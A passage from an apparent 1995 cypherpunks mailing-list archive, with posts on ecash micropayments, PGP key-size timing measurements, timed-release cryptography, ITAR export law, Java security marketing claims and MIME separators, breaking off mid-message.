or letters of introduction.  But if he is so well known (news to me), and
has a well known reputation -- probably a reputation on a par with noted
international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
probably a very busy fellow. 

I wonder who he is at AT&T?

>> Lots of other people have joined the list, and the subscription base has
>> done from an earlier plateau of about 700 subscribers to more than 1200
>> recently.
> 
>I don't care about quantity. Steve Bellovin is worth 500 subscribers
>-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
>lot of this stuff than most of what passes for careful thought from
>the average person here.

Yes.  He is worthwhile from what I have seen.

He has said that he will probably be consulted at AT&T if there is ever
any type of Internet issue.  I'm not sure if that makes him one of AT&T's
Internet consultants or whether he is one of the responsible persons at
AT&T.  But I'd rather let Steve speak for himself on that. 

I don't know if Steve has the explicit authority to have the Chairman take
his call as an example and I doubt that -- on his pen -- a full Board
Meeting could be convened to bring all opinions forward to the table, so
that those who are CHARGED with decision making CAN make decisions. 

I think he probably has to go through channels. 

(Direct access to senior management is generally part and parcel of any 
functioning security policy.  It has to be.  And I assume that AT&T does 
have one.)

I'm slowly working through my mail queue, and will probably reply soon to
Steve's email.  It's flagged.  And I can probably ask at that time whether
he DOES read this list, and settle the issue. 

I really don't want to bother him though with trivial questions and
comments when he's probably busy forming an inter-departmental Working
Group to *carefully* deal with the Netscape issue -- a large committee to
focus on the problem that blindsided AT&T, a committee to focus on
deployment strategies.  I assume that that's why Steve's not posting to
this list and providing free entertaining content to Internet subscribers. 

He's probably too DAMNED busy.  (And not getting paid NEARLY enough ;)

I hope that AT&T's Netscape Security Audit Working Group's first order of
business is to elect one person to deal with external email, rather than
having each individual employee from AT&T send, _yours truly_ a "Me Too"
... "I'm responsible"  ... "this is MY turf" reply.  But that's not a list
discussion so I'll take it off-line where it belongs, and keep Perry
as happy as I can.)

That discussion ... the "everyone at AT&T is responsible" one, belongs
with the Netscape one ... the one where "no one at Netscape is
responsible", the one where "nobody from Netscape ever replies" to your
email. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Fri, 10 Nov 1995 04:30:57 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <m0tDcXQ-000900C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:08 PM 11/8/95 -0800, Hal <hfinney@shell.portal.com> wrote:
>>Consider, though, what happens in the current ecash system if it were
>>used to charge a penny per page.  You would click on a link in your web
>>browser to go to the new page.  It would set the GET request to the
>>remote server as usual.
>
>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.


I think that one thing that's needed is the concept of probabilistic payments.  

The problem:  How do you pay, say, 1/10th of a penny for a good or service
if the minimum denominated coin is a penny?   This is important, because as
we all know the cost of providing computer services of all kinds (and data
transmission) can be expected to continue to drop as time progresses.   If
we allow the minimum size coin to control our lives, it will keep prices
higher than they ought to be and prevent low-cost services from existing.

The answer, I suggest, is that the payer and payee should "flip a coin,"
actually a probability, such that the likelihood of making the payment times
the size of the payment equals the intended payment.

If a seller wants to sell access at 1/10th of a penny per page, he and I can
flip a 10-sided coin (using encryption principles already established)
leading to a 1/10 likelihood that I would have to pay 1 cent, and a 9/10
likelihood that I'll get the service for free.  On the average, it'll be a
payment of 1/10th of a cent.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 10 Nov 1995 06:03:59 +0800
To: perry@piermont.com
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091951.OAA15564@jekyll.piermont.com>
Message-ID: <199511092046.MAA16851@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I've found that in practice the compression pass takes longer than the
> RSA pass for PGP. If you accept the time for the file compression I
> don't see how you can have trouble with the 1024 bit RSA operation.

When in doubt, measure. The following measurements were done on a DEC
Alpha 3000/300, 150Mhz, Digital Unix 3.2. The first test file was an
email I sent this morning, with a size of 5379 bytes, which is typical
for the email I send. The second test file was the PostScript version
of a 52 page tech report done by our research group this summer, with
a size of 656676 bytes. The version of PGP used was MIT 2.6.2, compiled
with the default osf configuration (-O compile flag).

In all cases, user time only (not system time) is measured. This seems
reasonable, because neither compression nor RSA inherently require I/O.
The standard deviation on timings was somewhere around 5 or 10 ms. I
took the average "by eye" over about ten runs each. I did not include
signing tasks, as neither PGP/MIME signing nor clearsigning include a 
compression step.

Task 1: encrypt file, generating compressed output (RSA is quadratic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           95 ms   5379 bytes      2205 bytes
382      off          90 ms   5379 bytes      8165 bytes
1024     on           90 ms   5379 bytes      2315 bytes
1024     off          85 ms   5379 bytes      8275 bytes
382      on           3.86 s  656676 bytes    255575 bytes
382      off          2.43 s  656676 bytes    920984 bytes
1024     on           3.84 s  656676 bytes    255685 bytes
1024     off          2.43 s  656676 bytes    921090 bytes

Task 2: decrypt file from Task 1 (RSA is cubic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           135 ms  2205 bytes      5379 bytes
382      off          140 ms  8165 bytes      5379 bytes
1024     on           1.14 s  2315 bytes      5379 bytes
1024     off          1.14 s  8275 bytes      5379 bytes
382      on           1.43 s  255575 bytes    656676 bytes
382      off          2.68 s  920984 bytes    656676 bytes
1024     on           2.42 s  255685 bytes    656676 bytes
1024     off          3.74 s  921090 bytes    656676 bytes

We can conclude that for small files, the size of a typical email,
compression is completely negligible, and the effect of key size is
significant. We can also conclude that for large compressible files,
compression increases encryption time by roughly two seconds per
MB, but decreases decryption time by roughly the same amount (by
virtue of having to decrypt fewer bytes).

Raph






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:45:43 +0800
To: cypherpunks@toad.com
Subject: Market Value of Web Pages
Message-ID: <acc79e46010210045c32@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 11/9/95, Bill Frantz wrote:

>BTW - I don't think we should be talking about a penny/page cost because it
>is way too high for the current market.  For example, my copy of Applied
>Cryptography V2 cost about $.067/page AND came with the media to keep it
>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>also came with the media.  I would think that somewhere between 1/100 to
>1/10 of a penny/page is closer to the current market value of the page
>content.

With all due respect to Bill--his mention of agorics tells me he knows
something about computational ecologies and markets--, there is no
reasonable way to say what price is "closer to the current market value of
the page content," except by what the market will bear!

Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
report that sells for $2000 has a "market value" to someone of $400 a page.
You can all think of all kinds of other examples.

Closer to home, a copy of "Penthouse" which sells for $5 and which has
perhaps 10 photographs of "interest" to someone can be said to roughly have
a value of $.50 per Web page of equivalent material. "Penthouse" and
"Playboy," to name just two examples, have "members only" Web pages, and
they are apparently doing OK financially. (Other "members only" Web pages
may also be doing well....it is _these_ Web pages that provide an example
of paid access in contrast to the some other examples, where even a
fraction of a cent per page is too much.)

Personally, I've yet to pay for a Web page. Too much "free" stuff, too much
stuff coming out of the firehose. (And a lot of JPEGs from the "members
only" page are being "liberated" and posted--often through remailers--to
the alt.binaries.pictures.* "free" newsgroups, or placed on other Web
pages.)

I expect this to someday change, and to pay for some things at a fraction
of a cent per hit, some other things for a few cents a hit, and maybe even
some things at dollars per hit.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:33:34 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <acc7a170020210041a84@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 11/9/95, Beavis B. Thoopit wrote:
>> That's a pretty large number of assumptions:
>>
>>       tamper-proof delay line
>>       => tamper-proof crypto box ("transformation function with state")
>>       => tamper-proof delay line
>>
>> Why not just put a tamper-proof clock in the tamper-proof crypto box
>> and not bother with the delay lines?
>
>The tamper proof aspect is really secondary to the math question.
>The idea that if I set up a stream of bits through a transform, that
>the original state of the transform affects the final outcome after
>N iterations.

The tamper-proof (more correctly, "tamper-resistant" or
"tamper-responding") hardware is so that attackers do not alter the clocks,
as one example, to "speed up" the time release. Or grab the key, as another
example.

(Cranking up the clock speed may or may not be possible and still have the
device work, but it's still an attack to consider.)

If the attacker can grab the internal state of the device, he can of course
run the "transform" talked about above on his equipment.

>If the transform exists, it will ease/eliminate the reliance on the
>"economics" of cryptography to build a tamper-proof physical device.

You'll need to more carefully argue your thesis. I cannot imagine a method,
save perhaps for quantum computing techniques, which can avoid the need for
"secure secrets," either via a person keeping a secret or a box keeping a
secret.

If the box is not secure against tampering, and an attacker gets in, he
effectively "knows" all of the secrets.

BTW, the "launch into solar orbit" scheme that has again surfaced here is
just a variant of making the costs of an attack very high.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:54:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <acc7a3f604021004b22d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:21 PM 11/9/95, jim bell wrote:

>The problem:  How do you pay, say, 1/10th of a penny for a good or service
>if the minimum denominated coin is a penny?   This is important, because as
>we all know the cost of providing computer services of all kinds (and data
>transmission) can be expected to continue to drop as time progresses.   If
>we allow the minimum size coin to control our lives, it will keep prices
>higher than they ought to be and prevent low-cost services from existing.

A non-problem.

Ask any business whether the "minimum denominated coin" is a penny. Perhaps
the minimum denoominated _coin_ is a penny, in the U.S., but vast numbers
of widgets are priced at sub-cent levels.

True, no purchase orders are written for sub-cent prices, but this is a
transaction cost issue, not something basic to the currency. (Likewise,
Hal's concerns about ecash speed are basically transaction cost issues.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 03:37:30 +0800
To: sommerfeld@orchard.medford.ma.us (Bill Sommerfeld)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <199511091852.NAA01172@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


> That's a pretty large number of assumptions:
> 
> 	tamper-proof delay line
> 	=> tamper-proof crypto box ("transformation function with state")
> 	=> tamper-proof delay line
> 
> Why not just put a tamper-proof clock in the tamper-proof crypto box
> and not bother with the delay lines?

The tamper proof aspect is really secondary to the math question.
The idea that if I set up a stream of bits through a transform, that
the original state of the transform affects the final outcome after
N iterations.

If the transform exists, it will ease/eliminate the reliance on the
"economics" of cryptography to build a tamper-proof physical device.

Here is another implementation of the idea:

initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
do forever      /* actually until the plaintext spews out */
  sleep 1 unit
  for each element in the buffer
    buffer[ element ] = magictransform( buffer[ element ] )

The initial buffer must be secret!

Calculating the intial buffer in such a way that after N iterations
the plaintext message appears is what must happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 10 Nov 1995 03:43:29 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Pegasus Mail
In-Reply-To: <199511091528.HAA05703@jobe.shell.portal.com>
Message-ID: <m0tDc9b-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

: One
: of the elements of the offense of violating the arms export control act
: is that the violation be willful.  The exporter has to violate a known
: legal duty not to export the item.  One of the reasons for this is simply
: that the ITAR list is long and technical and average individuals cannot be
: expected to know all its details.  This is mentioned in the Lizarraga
: case, at approximately 541 F2d 828:

  . . . .
 
: So in this case I think widespread publicity about the ITARs can be
: considered harmful.  All those helpful people going around warning others
: that they are exporting software are actually removing a defense against
: charges of export.

This is a serious problem.  On the other hand there are civil penalties
for violating the ITAR that can be imposed without any showing of
willfulness.  So the non-willfull exporter is still at risk, even if he
does not know it.  And if people are not informed in general, then the
boys from the Office of Defense Trade Controls and NSA, can selectively
inform only those whom they wish to harass, which is perhaps the
nastiest aspect of the ITAR.

The only long term solution is to establish that the ITAR's provisions
relating to cryptographic software are unconstitutional and void.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 10 Nov 1995 03:47:44 +0800
To: cypherpunks@toad.com
Subject: Re: (cpx) Re: ecash speed
In-Reply-To: <v02120d03acc7c8d9c381@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951109140743.26577A-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


There is certaily no need for an extra connection from the merchant back
to the customer.  See draft-eastlake-internet-payment-00.txt.

Donald (not on cybpherpunks)

On Thu, 9 Nov 1995, Robert Hettinga wrote:

> 
> --- begin forwarded text
> 
> Date: Wed, 8 Nov 1995 21:08:51 -0800
> From: Hal <hfinney@shell.portal.com>
> To: cypherpunks@toad.com
> Subject: Re: ecash speed
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.  You would click on a link in your web
> browser to go to the new page.  It would set the GET request to the
> remote server as usual.
> 
> The server would fire up a CGI script which will run the shop software.
> That software will make a TCP stream connection back to your ecash wallet
> software which is running on the system where your client is.  It sends a
> request to get payed $.01.  Assuming the wallet is configured to
> automatically approve such a payment, it will send a one penny coin to
> the shop software along the opened link.  (This may also involve doing a
> PK encryption on the coin as an anti-theft measure; this aspect of the
> current ecash system is not documented AFAIK.)
> 
> The shop software then opens a TCP stream connection to the bank, and
> forwards the coin there.  The bank receives it, and checks the public
> key signature in the coin.  It then compares the coin against every other
> coin which has ever been spent (within the validity period of the coin)
> to make sure it is not being doubly spent.  If this all checks out it
> sends back some authentication message to the original server.  The shop
> software then delivers the new page to the client browser.
> 
> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.
> 
> Hal
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 10 Nov 1995 07:01:44 +0800
To: Moroni <moroni@prufrocks.scranton.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>
Message-ID: <Pine.ULT.3.91.951109140853.9570A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Nov 1995, Moroni wrote:

>    Where can one get a copy of ITAR ? Secondly , has anyone written any 
> books on the subject and if so who and what?

I believe ITAR is 22 USC $ 2278 and environs, which should be at
http://www.law.cornell.edu/uscode/22/2778.html. I can't quote from it
right this second because there seems to be a routing problem inside
sprintlink (must be SAIC censoring us).

Books, I dunno.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Mon, 13 Nov 1995 20:53:48 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Information Resource Engineering Inc.
Message-ID: <Pine.HPP.3.91.951109141848.26057C-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for information about encryption products made by this company.
Any pointers will be appreciated.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 10 Nov 1995 07:32:01 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511092020.MAA28155@jobe.shell.portal.com>
Message-ID: <199511092229.OAA05862@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Is Steve AT&T's Security Officer or something?  He never really introduced
> himself when he emailed me, and he never presented me with any credentials
> or letters of introduction.  But if he is so well known (news to me), and
> has a well known reputation -- probably a reputation on a par with noted
> international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
> probably a very busy fellow. 


	Steve's reputation is not on par w/Dr Fred's. Steve is
actually respected. I will refrain from commenting on Dr. Fred's
reputation. ("If you don't have anything nice to say...")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 07:41:11 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511092241.OAA14102@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Ray Cromwell wrote:

> > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > 
> > >From the Java Web pages (as combined in Firewalls/BoS):
> > 
> > > The language's security features (not just applets):
> 
> [Long list of bullshit deleted]

I don't think that this is *bullshit* ... the questions I mean ... but,
I for one am tired of people promoting products in a manner which flies 
in direct contravention of expert consensus.

No one would accept a pharmaceutical company that says a product is X, 
if it is in fact Y.  And no one would question if a researcher came 
forward, and corrected the company and set the record straight.

This is generally called ETHICS ... not bullshit.  The problem is not in 
the messenger, it's in the organization that is simply willing to 
roll the dice when it comes to public safety and security.

>  "Dr" Cohen. If you want to criticize Java, why not read the technical
> papers rather than spewing questions and assertions based from ignorance.

I've got a better suggestion.  Why don't companies like Sun ensure 
that their sales and technical material is reviewed for gross 
inaccuracies and/or misrepresentations?

> When you want to criticize a piece of engineering, you don't look
> at the feature list or white paper. As is made clear in your post,
> you don't know the meanings of phrases used in the Java paper, nor do
> you understand how the machinery works. (e.g. byte code verifier)

I won't speak for Dr. Frederick B. Cohen, but I will speak for myself,
and provide this list with but a single example.  And I won't quote
from a white paper, but will instead quote from some Sun literature
which crossed my desk the day before yesterday, literature that Sun
provided as part of their worldwide introduction of Ultra workstations.

What they called a "breakthrough for network computing".

What follows is not "technical commentary", but is simply what they
provide as information to MIS managers, Sun resellers and invited
press. This copyrighted brochure, which looks like it was printed
11/95 makes the following verbatim comment on the "Java Internet
Application Language".

> Java has an extensive library of routines for coping with TCP/IP 
> protocols such as HTTP and FTP.  Java applications can open and access 
> objects across the net via URLs with the same ease that programmers are 
> used to when accessing a local file system.
>
> Java is intended to be used in networked/distributed environments.  
> Therefore, much emphasis has been placed on security.  The product 
> enables programmers to create virus-free, tamper-free systems through 
> public-key encryption authentication techniques.

Hmmm, maybe I'm confused, but this is grossly overselling a product's
capabilities, and is setting absolutely unrealistic expectations --
expectations which are doomed from the start never to be met, let
alone exceeded.  This expectations/satisfaction gap will ultimately
lead to customer dis-satisfaction.

Then again ... the solution to virus-free, tamper-free systems with
TCP/IP protocol "coping" has always been a problem that's been waiting
for a "product solution" to help all of us to enable our programmers.

God help us all.

As part of my copious spare time, I might make a personal comment
which hopefully gets to some of the powers that be at Sun.

Firstly, I wasn't aware that HTTP was a TCP/IP protocol.  I didn't
even think that there was a draft RFC on it.  I thought that all that
there was, was an internet-draft, which is a different kettle of fish.
I never realized that HTTP was on standards track, and part of the
appliction protocol.  It really is news to me.  But that's a quibble,
and I'm really behind on my reading, so, I could be wrong.

My second comment is perhaps more actionable.  I would much rather
that a product clearly and definitively state what it has implemented.
Maybe something like the following.

Implementation of the following IETF (Internet Engineering Task Force)
protocols :IP (RFCs 791, 894; MIL-STD 1777); UDP (RFC 768); TCP (RFC
793, MIL-STD 1778); ARP (RFC 826); RARP (RFC 903); ICMP (RFC 792);
BootP (RFCs 951, 1048); RIP (IDEA004); DNS (RFCs 1034, 1035); Internet
Subnetting (RFC 950); and Internet Assigned Numbers (RFC 1010). Maybe,
also that the product complies with Requirements for Internet Hosts
Communications Layers (RFC 1122) and with A Standard for the
Transmission of IP Datagrams over IEEE 802 Networks (RFC 10..
something or other).

This is far more informative (ironically) than saying that:

> Java has an extensive library of routines for coping with TCP/IP
> protocols such as HTTP and FTP.

Hmmm, FTP.  That's RFC 7?? or something like that, isn't it?? 

As an example, I'd like to know how Java handles a file, that is called
foo.bar.au.  Does a .au file refer to an audio file, or does it refer to
something from Australia??  

I'll stop here, and not continue with my deconstruction, especially
the part that continues:

> Java is intended to be used in networked/distributed environments.
> Therefore, much emphasis has been placed on security.  The product
> enables programmers to create virus-free, tamper-free systems through
> public-key encryption authentication techniques.

To every problem, a product solution ... we can leave mathematician's
at the door, and simply enable our programmers.

Those technical analyst rocket scientist types, really can't know
anything, at all.  Can they?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


P.P.S. To Sun:   I was also a bit disappointed that nobody thought to 
       show what a vice-presidential tribble looks like on satellite 
       simulcast ... then again, I was thrilled with the female 
       "trader" who spoke about patterns in chaotic systems to her 
       cab driver.  

       Did she work the back office at Daiwa, or something??  Probably 
       believe's in runs of luck, too ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 10 Nov 1995 04:32:17 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <199511091951.OAA15564@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien writes:
> > On the other hand, it costs nothing by most people's standards to use
> > a 1024 bit key, so why not use one? I find that there is only a point
> > in using low security for anything in particular when there is a
> > perceivable cost to it -- if the cost is typing a different number
> > while doing key generation, I don't see why one should suffer the
> > tradeoff.
> 
> Perhaps it costs you "nothing," Perry, but not all of us have the
> massively parrallel 64-way interleaved banked memory nanosecond-latency
> box you have on your desk.

I've found that in practice the compression pass takes longer than the
RSA pass for PGP. If you accept the time for the file compression I
don't see how you can have trouble with the 1024 bit RSA operation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 9 Nov 1995 22:15:26 +0800
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <9511091356.AA09725@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:
 >    On an unrelated topic... cypherpunks like to count bits, right?
 > What is the correct number of pseudorandom bits to use in a MIME
 > multipart separator? If the data has a line which matches the
 > separator, the message is corrupted. Of course, if you can take
 > multiple passes through the data, you can simply verify that it does
   ***************
No need !
 > not contain a line which matches the separator. But if you're
 > restricted to a single pass, then the only way to do it is to use a
 > randomly generated separator.
I've waited a bit, but as nobody seem to have pointed out, you can
definitly find a unique stream in a *single* pass (but maybe what you
really want is no pass at all ?)
{you add a new random byte each time you find your sequence in the
stream, and goes forward (as the previous separator was not in the
"past" of the stream, you don't need to go back)}

What am I missing ? (anyway, see below)
(I hope my answer is not as clueless as the "A-dice anonymous" one)

 >    I figure that 128 bits should _definitely_ be enough (that's what
 > is in the new premail code now). Even 64 bits should ensure that it is
 > unlikely that anyone will ever experience message corruption over the
 > expected lifetime of premail. However, it makes me nervous. What do
 > people think?

Isn't PGP encoded stream containing only base64 chars ? Why not use
"====PGP part #===="  (as you can't have more than 2 = in a base 64,
and only at the end anyway)
or "@PGP part #" or whatever starting with a non base64 char ?

so "@" = 8 bits is my anwser, do I win ;-) ?

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Uzi NORAD DES NSA [Hello to all my fans in domestic
 surveillance] Clinton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 10 Nov 1995 08:03:09 +0800
To: cypherpunks@toad.com
Subject: Gingrich, "crypto coalition" & dysfunctional philosophy
In-Reply-To: <199511091637.RAA06491@utopia.hacktic.nl>
Message-ID: <199511092308.PAA18692@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



From: nobody@REPLAY.COM (Anonymous)
>The gov't may well lose this fight eventually, but a few heads are gonna
>get broken before either side wins. This fight is playing itself out on
>the level of policy now, but it's much bigger than a policy issue. And the
>"revolution" of Newt and his legions of weenies (I say nothing of Clinton
>and his legions of weenies) is bullshit: he's an empty opportunist who's
>riding a fractious coalition that'll make Clinton look like a libertarian
>if it ever gets control of the country. And right now he's cluing in to
>the fact that he can score some points on encryption issues: he's got his
>eye on the snowballing WiReD coalition, which *no one* knew existed until
>a few years ago.

a short comment on Gingrich: I think he is one of the few politicians with
balls enough to make tough choices such as budget cutting. of course people
detest someone like him. he has horrible approval ratings in the single
digits. people would rather have politicians lie to them that no tough 
choices are necessary in the future, or that if any are, all the 
grandmothers in the country will be conviently exempted. I don't see 
Gingrich at all as an opportunist in the sense of Clinton, i.e. someone 
who has no intrinsic moral compass
that governs his decisions and positions on issues. to the contrary Gingrich
has definite convictions on various issues. he is willing to compromise
on them frequently to get a consensus, however.

but my main point in writing was that I thought I would highlight this 
phrase given to us by A.Nonymous: the "crypto coalition".
or it might be called the "computer coalition". I think I see a few
faint glimmerings of a new political movement, potentially.
the recent Washington Times editorial on the Exon pornography law,
encryption, and the superiority of allowing people to develop tools
to screen what they don't want to so, could be considered a
portrayal of some of the key philosophies.

its very interesting to contemplate that the online crowd could become
a more well-organized political coalition that has influence in politics.
its clear to me this is happening weakly and informally at the moment.
(i.e. people on the internet having similar philosophies, hence voting
with the same aims, although not organizing to do so yet).
a key ingredient I see working against this:

the "coalition" has a lot of libertarian sentiments, and libertarians
tend to be anti-government and almost disdainful of even participating
in politics.

one might differentiate between cybernauts who are interested in reforming
our government and using the Net as a tool to do so, such as Jim Warren, and
people at the opposite end of the spectrum of "participation" such as
TCM, who seem to advocate that political battles be simply rejected
or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
noises of his I quoted were distinctly uncharacteristic.)

if anyone is going to have influence in politics, it would be the former
type. but at least in the places in cyberspace where I hang out, I tend
to see more of the latter type: extremist libertarians who almost seem
to suggest that government is inherently unclean and dirty, no matter
what form it takes. I think these are the types that would hate a
government and advocate disenfranchisement with it no matter what 
direction it took, even if a libertarian was
elected to a powerful office. (its an interesting question to contemplate).

it seems to me to be largely a philosophy of alienation bordering
on nihilism.

now, I have been trashed in public for this position before, but the
philosophy of "us vs. them" applied to government in my opinion is the
wrong paradigm and only contributing to the problems, imho. an organized
"cyberspace coalition" could have tremendous political power to the point
